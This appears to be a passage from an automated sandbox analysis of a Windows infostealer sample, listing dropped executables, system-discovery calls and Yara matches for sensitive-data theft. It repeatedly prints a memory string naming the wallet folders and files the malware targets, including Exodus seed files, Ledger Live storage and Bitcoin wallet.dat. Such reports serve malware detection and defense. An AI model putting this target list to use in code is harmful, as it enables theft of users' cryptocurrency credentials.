                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C6D21C GetLocalTime,0_2_00C6D21C
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C6D27A GetUserNameW,0_2_00C6D27A
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C4B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00C4B952
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C142DE

Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 21.0.Gxtuum.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.0.Gxtuum.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.Gxtuum.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.nhDLtPT.exe.bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.nhDLtPT.exe.bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.1782574386.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000003.1399696987.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1440488176.00000000002B1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1443417785.00000000002B1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.2150116458.0000000004960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000003.1402595713.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000003.2208833201.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000002.2190924706.0000000000161000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1457033366.0000000000621000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000003.1414306794.0000000005090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000031.00000002.2286174496.0000000000161000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.1369460777.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nhDLtPT[1].exe, type: DROPPED
Source: Yara match | File source: 62.2.7dbaa342f5.exe.dd00000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 62.2.7dbaa342f5.exe.da70000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 62.2.7dbaa342f5.exe.da18000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 62.2.7dbaa342f5.exe.da44000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 62.2.7dbaa342f5.exe.da9c000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000003E.00000002.2594796685.000000000DA18000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003E.00000002.2584237891.000000000D91C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003E.00000002.2596642815.000000000DD00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003E.00000002.2594796685.000000000DA70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003E.00000002.2594796685.000000000DA9C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003E.00000002.2594796685.000000000DA44000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe, type: DROPPED
Source: Yara match | File source: 00000019.00000003.2063180045.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2385311293.0000000000F81000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.1967536880.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2378435053.000000000075E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ILqcVeT.exe PID: 4156, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rXOl0pp.exe PID: 8104, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0000001D.00000003.2078657215.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000003.2018674218.0000000004774000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vertualiziren.exe PID: 8076, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: benskvi.exe PID: 3108, type: MEMORYSTR
Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                                Source: ILqcVeT.exe, 00000017.00000002.2378435053.00000000007D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
